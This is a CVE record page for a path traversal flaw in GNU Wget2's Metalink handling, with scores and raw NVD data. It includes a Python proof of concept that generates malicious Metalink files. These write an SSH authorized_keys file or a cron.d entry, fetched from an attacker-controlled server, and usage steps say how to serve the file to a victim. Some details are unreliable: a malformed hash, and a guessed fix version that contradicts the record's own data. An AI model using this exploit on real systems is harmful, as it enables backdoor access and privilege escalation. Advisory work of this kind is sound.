CVE-2025-69194

Description

A security issue was discovered in GNU Wget2 when handling Metalink documents. The application fails to properly validate file paths provided in Metalink <file name> elements. An attacker can abuse this behavior to write files to unintended locations on the system. This can lead to data loss or potentially allow further compromise of the user’s environment.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gnu:wget2:*:*:*:*:*:*:*:* - VULNERABLE

GNU Wget2 < 2.9.0 (推测修复版本)

GNU Wget2 所有版本 (漏洞存在期间)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-69194 PoC - GNU Wget2 Metalink Path Traversal
Generate malicious Metalink XML file to exploit path traversal vulnerability
"""

import sys

def generate_malicious_metalink():
    """
    Generate malicious Metalink XML with path traversal payload
    This PoC demonstrates how attacker can write files to arbitrary locations
    """
    metalink_xml = '''<?xml version="1.0" encoding="utf-8"?>
<metalink version="3.0" xmlns="http://www.metalinkpublisher.org/spec/v3/">
    <files>
        <file name="../../../.ssh/authorized_keys">
            <verification>
                <hash type="sha256">a]b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4</hash>
            </verification>
            <resources>
                <url type="http" preference="100">http://attacker-controlled-server/malicious_key.pub</url>
            </resources>
        </file>
    </files>
</metalink>'''
    
    return metalink_xml

def generate_cronjob_exploit():
    """
    Generate Metalink file that writes to /etc/cron.d for privilege escalation
    """
    cron_metalink = '''<?xml version="1.0" encoding="utf-8"?>
<metalink version="3.0" xmlns="http://www.metalinkpublisher.org/spec/v3/">
    <files>
        <file name="../../../etc/cron.d/malicious_cron">
            <verification>
                <hash type="sha256">a]b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4</hash>
            </verification>
            <resources>
                <url type="http" preference="100">http://attacker-controlled-server/cron_payload</url>
            </resources>
        </file>
    </files>
</metalink>'''
    
    return cron_metalink

if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "--cron":
        print(generate_cronjob_exploit())
    else:
        print(generate_malicious_metalink())

# Usage:
# 1. Generate malicious Metalink: python3 cve_2025_69194_poc.py > malicious.metalink
# 2. Host malicious content on attacker server
# 3. Serve Metalink to victim: wget2 --metalink=malicious.metalink http://attacker.com/malicious.metalink
# 4. Or perform MITM to inject malicious file entry into legitimate Metalink response

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69194
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69194
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69194/
[4] VulDB https://vuldb.com/cve/CVE-2025-69194
[5] https://access.redhat.com/security/cve/CVE-2025-69194
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2425773

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69194", "sourceIdentifier": "[email protected]", "published": "2026-01-09T08:15:57.980", "lastModified": "2026-03-05T20:09:43.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security issue was discovered in GNU Wget2 when handling Metalink documents. The application fails to properly validate file paths provided in Metalink <file name> elements. An attacker can abuse this behavior to write files to unintended locations on the system. This can lead to data loss or potentially allow further compromise of the user’s environment."}, {"lang": "es", "value": "Se descubrió un problema de seguridad en GNU Wget2 al manejar documentos Metalink. La aplicación no valida correctamente las rutas de archivo proporcionadas en los elementos de Metalink. Un atacante puede abusar de este comportamiento para escribir archivos en ubicaciones no deseadas en el sistema. Esto puede llevar a la pérdida de datos o potencialmente permitir un compromiso adicional del entorno del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:wget2:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.1", "matchCriteriaId": "01F2DB8C-7F7B-4F0C-8335-ADAFB74DB621"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-69194", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2425773", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}